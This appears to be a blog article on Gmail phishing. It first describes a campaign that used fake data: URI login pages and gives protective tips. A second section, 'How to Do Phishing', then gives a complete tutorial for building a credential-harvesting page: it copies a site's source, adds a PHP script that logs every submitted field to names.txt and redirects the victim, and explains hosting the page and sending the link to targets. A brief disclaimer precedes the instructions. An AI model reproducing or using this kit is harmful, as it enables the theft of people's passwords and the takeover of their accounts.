Gmail phishing: Latest Cyber Attack

Email phishing isn’t going to be dead anytime soon. Scammer, cyber attackers and hackers are getting smarter with each passing day and they are evolving new ways of convincing people that their mails are true. A new kind of sophisticated phishing technique has been in vogue wherein hackers compose highly convincing emails for the target users. In this technique past messages and attachments of the target users are analyzed before composing such mails which breathes of originality and normality and urges users to click to divulge their critical information.

The Gmail-phishing trend

This particular trend of phishing has been uncovered by Mark Mauder, the CEO of WordPress’s security plugin is called Wordfence. In this particular kind of evolved phishing attack hacker first sends across an email which appears to the user as a normal mail containing a PDF which possess a similar file name as seen earlier by the user.

Another gruesome thing about this PDF is that it carefully contains a disguised image which when clicked by the users launches a new tab will appears just like official Gmail log-in page. In is extremely tough for a normal users to find the minute details which reveals it isn’t the real Gmail sign in page. This can only be found by closing looking at the address bar revealing a script running right there.

So real, so convincing

As stated earlier it is extremely difficult for anyone to find flaws in the webpage design which results in targeted user entering their log-in details without any second thought. Once a user has entered the details then it can be used by the hackers to gain access to account for stealing the data or simply forward one mail to other recipients from the very same mail. In one such incident hackers has successfully hoodwinked an athlete believing their mail and link to be the true Gmail sign-up page.

Thereby they used his accounts log-in details to similar mails to other athletes in the team and within a short whole team’s emails and data were compromised. Hackers don’t waste much time after getting the log-in details. They use target users email account to send out multiple mails with user’s actual subject lines to other people in the contact list.

How to protect yourself from such phishing attack

There are some smart ways to outwit the hackers and stay safe from such attacks. One should always check upon the address of opening links when clicked on any kind of email. In this case the legitimate Gmail page has ‘https://’ address while the phishing attacks links possess ‘data:text/html.https://’. This clearly shows the given link brings the fake url of the Gmail’s sign-up page and it is also too long in nature. The best way to secure your Gmail account is to enable the two form authorization on Gmail wherein users has to insert not just their id and password but they also have to enter a passcode sent to their mobile device to enter their email account.

How to Do Phishing

Phishing simply means creating a fake page of a popular website or company and stealing personal information like username, password, credit card details, and account numbers etc. with the help of that page. Phishing is one of the simplest techniques used by the hacker to hack the account by stealing the login details. Catching a phishing is quite difficult because it has exactly same home page as the original website but yes the link or URL is different. So if you find any such web page displaying the content of the original website but having other abrupt link then you must report to the admin of the site.

Phishing is illegal to practice so please don’t do it. But yes everyone should know that how does it takes place so that they are never caught in the threats. So let us now learn that how phishing is done and how fake page is created but before we begin let me declare:

DISCLAIMER : I am not responsible for any harm caused by the user. The tutorial is purely and only for educational purposes. Please do not misuse this tutorial. 
 

So it’s a kind request from everyone that please don’t misuse it but try to learn it so that you are not affected by this at any instance. So let’s begin:

Firstly you need to have a hosting account. You can also create a free hosting account that is available on many websites, you can simply google it and create an account in any one of them.

Now what hackers do is that they first select the target website like gmail, facebook etc. Once selected, they create the fake page of that original website.

Creating a fake page is quite simple. Just go to any website say Gmail and then right click and select the option “view source code” and then copy all the code in the notepad and save it as target.html.
Now other step is to create a file named “code.php”. Simply open note pad and copy the following
code:

<?php
header ('Location: http://www.xyz.com');

$handle = fopen("names.txt", "a");

foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

You can replace www.xyz.com with any website you want to direct user to.

Now after copying the following code save it as code.php and now it’s almost done.

Now go to the file target.html and open it because some editing has to be done. Now press ctrl+f and search for “action=” with login written in it. You will observe one link there so replace that link or URL with the file code.php that you have created initially. And now it’s almost done. Also create one file named names.txt where you will get the passwords of the infected user.

Now simply go your hosting account and upload the three files that are: target.html, code.php and name.txt. After they are successfully uploaded it’s ready. Now you will have a link to the fake page like: http://abcxyz.com/target.htm. You can select domain name according to your choice. Now the fake page is ready and now you can submit this link to your friend or anyone else. If he login to this fake page then you can check his username and password in the names.txt file as all the passwords will be stored here.

So this is all about hacking through phishing. But I request you all not to misuse it because it’s illegal and a big cyber-crime. So I hope you will never become the victim of such fake pages. Simply have a look at the link then log in or first reload the page then log in to the account. So in later posts we will also cover some interesting tricks like this so stay connected.